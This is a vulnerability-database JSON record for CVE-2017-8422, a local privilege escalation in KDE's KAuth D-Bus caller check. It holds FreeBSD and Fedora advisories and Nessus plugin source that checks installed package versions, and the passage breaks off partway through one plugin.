{"freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nAlbert Astals Cid reports:\n\nKAuth contains a logic flaw in which the service invoking dbus\n\t is not properly checked.\n\t This allows spoofing the identity of the caller and with some\n\t carefully crafted calls can lead to gaining root from an\n\t unprivileged account.\n\t \n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-10T00:00:00", "type": "freebsd", "title": "kauth: Local privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-10T00:00:00", "id": "0BAEE383-356C-11E7-B9A9-50E549EBAB6C", "href": "https://vuxml.freebsd.org/freebsd/0baee383-356c-11e7-b9a9-50e549ebab6c.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "Libraries for KDE 4. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-15T04:44:43", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kdelibs-4.14.30-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-15T04:44:43", "id": "FEDORA:BEF8F6070D29", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZP5YSPV5F5SQGBI2YKAPXV77FIFH244Y/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "description": "KAuth is a framework to let applications perform actions as a privileged us er. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-15T04:44:39", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kf5-kauth-5.33.0-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-15T04:44:39", "id": "FEDORA:023F66075F17", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DOVPKBULHFCINVL33RCP4RKRN6XK757W/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "description": "KAuth is a framework to let applications perform actions as a privileged us er. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-15T12:56:02", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: kf5-kauth-5.33.0-2.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-15T12:56:02", "id": "FEDORA:F10AC6045A3B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/C5XTVM6QMYUHAY7WHOT7RLYKNXRG6C6X/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "description": "KAuth is a framework to let applications perform actions as a privileged us er. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-15T18:24:46", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kf5-kauth-5.33.0-2.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-15T18:24:46", "id": "FEDORA:17304601C012", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4CTHBM3NE57G5QF6GOXPOGMMSTYOAUIP/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Libraries for KDE 4. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-17T05:57:38", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kdelibs-4.14.30-2.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-17T05:57:38", "id": "FEDORA:AFE6B604CD87", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/U65IQ2CERPEVRVCMJGSPT2A3TMFYCDMI/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:36:20", "description": "An update for kdelibs is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe K Desktop Environment (KDE) is a graphical desktop environment for the X Window System. The kdelibs packages include core libraries for the K Desktop Environment.\n\nSecurity Fix(es) :\n\n* A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting this issue.\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-13T00:00:00", "type": "nessus", "title": "Virtuozzo 7 : kdelibs / kdelibs-apidocs / kdelibs-common / etc (VZLSA-2017-1264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:kdelibs", "p-cpe:/a:virtuozzo:virtuozzo:kdelibs-apidocs", "p-cpe:/a:virtuozzo:virtuozzo:kdelibs-common", "p-cpe:/a:virtuozzo:virtuozzo:kdelibs-devel", "p-cpe:/a:virtuozzo:virtuozzo:kdelibs-ktexteditor", "cpe:/o:virtuozzo:virtuozzo:7"], "id": "VIRTUOZZO_VZLSA-2017-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/101468", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101468);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-8422\"\n );\n\n script_name(english:\"Virtuozzo 7 : kdelibs / kdelibs-apidocs / kdelibs-common / etc (VZLSA-2017-1264)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for kdelibs is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe K Desktop Environment (KDE) is a graphical desktop environment for\nthe X Window System. The kdelibs packages include core libraries for\nthe K Desktop Environment.\n\nSecurity Fix(es) :\n\n* A privilege escalation flaw was found in the way kdelibs handled\nD-Bus messages. A local user could potentially use this flaw to gain\nroot privileges by spoofing a callerID and leveraging a privileged\nhelper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting\nthis issue.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-1264.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c60a4e2e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-1264\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kdelibs / kdelibs-apidocs / kdelibs-common / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kdelibs-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kdelibs-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kdelibs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kdelibs-ktexteditor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"kdelibs-4.14.8-6.vl7\",\n \"kdelibs-apidocs-4.14.8-6.vl7\",\n \"kdelibs-common-4.14.8-6.vl7\",\n \"kdelibs-devel-4.14.8-6.vl7\",\n \"kdelibs-ktexteditor-4.14.8-6.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs / kdelibs-apidocs / kdelibs-common / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:08", "description": "This update for kdelibs4 fixes the following issues :\n\n - CVE-2017-8422: This update fixes problem in the DBUS authentication of the kauth framework that could be used to escalate privileges depending on bugs or misimplemented dbus services. (boo#1036244)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-19T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : kdelibs4 (SUSE-SU-2017:1335-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kdelibs4-debuginfo", "p-cpe:/a:novell:suse_linux:kdelibs4-debugsource", "p-cpe:/a:novell:suse_linux:libkde4", "p-cpe:/a:novell:suse_linux:libkde4-debuginfo", "p-cpe:/a:novell:suse_linux:libkdecore4", "p-cpe:/a:novell:suse_linux:libkdecore4-debuginfo", "p-cpe:/a:novell:suse_linux:libksuseinstall1", "p-cpe:/a:novell:suse_linux:libksuseinstall1-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1335-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100290", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1335-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100290);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-8422\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kdelibs4 (SUSE-SU-2017:1335-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for kdelibs4 fixes the following issues :\n\n - CVE-2017-8422: This update fixes problem in the DBUS\n authentication of the kauth framework that could be used\n to escalate privileges depending on bugs or\n misimplemented dbus services. (boo#1036244)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036244\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-8422/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171335-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a0b401d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-805=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-805=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-805=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-805=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2017-805=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kdelibs4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kdelibs4-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libkde4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libkde4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libkdecore4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libkdecore4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libksuseinstall1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libksuseinstall1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kdelibs4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kdelibs4-debugsource-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkde4-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkde4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkdecore4-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkdecore4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libksuseinstall1-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libksuseinstall1-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkde4-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkde4-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkdecore4-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkdecore4-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libksuseinstall1-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libksuseinstall1-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kdelibs4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kdelibs4-debugsource-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkde4-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkde4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkdecore4-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkdecore4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libksuseinstall1-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libksuseinstall1-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkde4-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkde4-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkdecore4-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkdecore4-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libksuseinstall1-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libksuseinstall1-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kdelibs4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kdelibs4-debugsource-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libkde4-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libkde4-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libkde4-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libkde4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libkdecore4-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", 